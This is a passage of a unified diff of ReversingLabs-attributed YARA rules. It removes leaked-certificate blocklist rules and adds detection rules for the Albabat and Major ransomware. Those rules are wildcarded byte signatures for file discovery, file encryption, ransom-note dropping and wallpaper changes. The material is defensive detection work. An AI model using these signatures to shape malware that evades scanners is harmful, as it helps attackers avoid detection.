?? ?? ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 45 ?? 50 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Corporation" and pe.signatures[i].serial=="75:0e:40:ff:97:f0:47:ed:f5:56:c7:08:4e:b1:ab:fd" and 980899199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($write_proc_mem) and ($generate_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1B5190F73724399C9254Cd424637996A : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Albabat ransomware." author = "ReversingLabs" - id = "dfb08450-c35c-5b7b-9d04-2c9a6af9bcf8" - date = "2023-11-08" - modified = "2023-11-08" + id = "11941c0d-45fb-5746-bbad-f43f336d4b1d" + date = "2024-03-18" + modified = "2024-03-18" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1037-L1053" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "08f287ccda93e03a7e796d5625ab35ef0de782d07e5db4e2264f612fc5ebaa21" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Corporation" and pe.signatures[i].serial=="1b:51:90:f7:37:24:39:9c:92:54:cd:42:46:37:99:6a" and 980812799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_00Ebaa11D62E2481081820 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "e192d271-b5de-5acc-a04f-02a26d9231ac" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1055-L1072" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2fafc6775ec88b5a1000afbc7234fbef6b03e9eaf866dae660dd2d749996cb5c" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Albabat" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Intermediate PCA" and (pe.signatures[i].serial=="00:eb:aa:11:d6:2e:24:81:08:18:20" or pe.signatures[i].serial=="eb:aa:11:d6:2e:24:81:08:18:20")) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Aab11Dee52F1B19D056 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "c6334520-7f93-59d0-8a22-721b928c14d1" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1074-L1089" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1f1215143dc828596e6d7eeff99983755b17eaeb3ab9d7643abdbb48e9957c78" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ?? + ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57 + F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D + 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D + ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 + 89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? + ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 + 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48 + 89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ?? + 48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? + ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ?? + ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 + } + $encrypt_files_p2 = { + C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ?? + 48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ?? + ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ?? + ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? + ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? + 48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B + 93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D + ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ?? + ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D + 35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ?? + ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? + ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? + ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B + 14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ?? + FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + } + $drop_ransom_note = { + 48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 + 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? + ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 + F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ?? + ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ?? + 49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19 + 4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48 + 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 + ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C + 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? + ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 + C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ?? + ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15 + ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 + 8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? + ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B + 8C 24 ?? ?? ?? ?? 48 85 C9 74 + } + $change_desktop_wallpaper = { + 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? + ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74 + ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D + 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C + 8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ?? + ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C + 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? + ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D + 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D + ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ?? + ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? + ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ?? + ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55 + } + $find_files_p1 = { + 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? + ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74 + ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B + 74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B + 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ?? + ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85 + DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8 + ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC + 48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ?? + ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ?? + ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC + } + $find_files_p2 = { + 73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ?? + ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68 + ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 + 8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ?? + 48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39 + CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ?? + 4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C + 24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? + 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ?? + ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B + 54 24 ?? 4D 89 E8 E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures[i].serial=="3a:ab:11:de:e5:2f:1b:19:d0:56") + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) and ($change_desktop_wallpaper) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Major ransomware." author = "ReversingLabs" - id = "b98769c6-805e-5cd0-96f1-67418fec40a6" - date = "2023-11-08" - modified = "2023-11-08" + id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa" + date = "2021-01-26" + modified = "2021-01-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1091-L1106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Major" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures[i].serial=="61:02:b0:19:00:00:00:00:00:2f") -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "00effc8a-066c-54ff-891e-c635d161b171" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1108-L1124" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 + ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 + 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? + 8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ?? + ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6 + } + $find_files_p2 = { + 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? + ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? + ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? + ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ?? + ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB + ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ?? + ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8 + ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 + C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? + ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B + 4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83 + F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 + } + $find_files_p3 = { + C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? + ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? + ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83 + C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B + F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45 + ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85 + ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1 + FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 + ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 + ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 + ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 + } + $find_files_p4 = { + 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? + 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ?? + ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B + CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 + 0F 84 ?? ?? ?? ?? 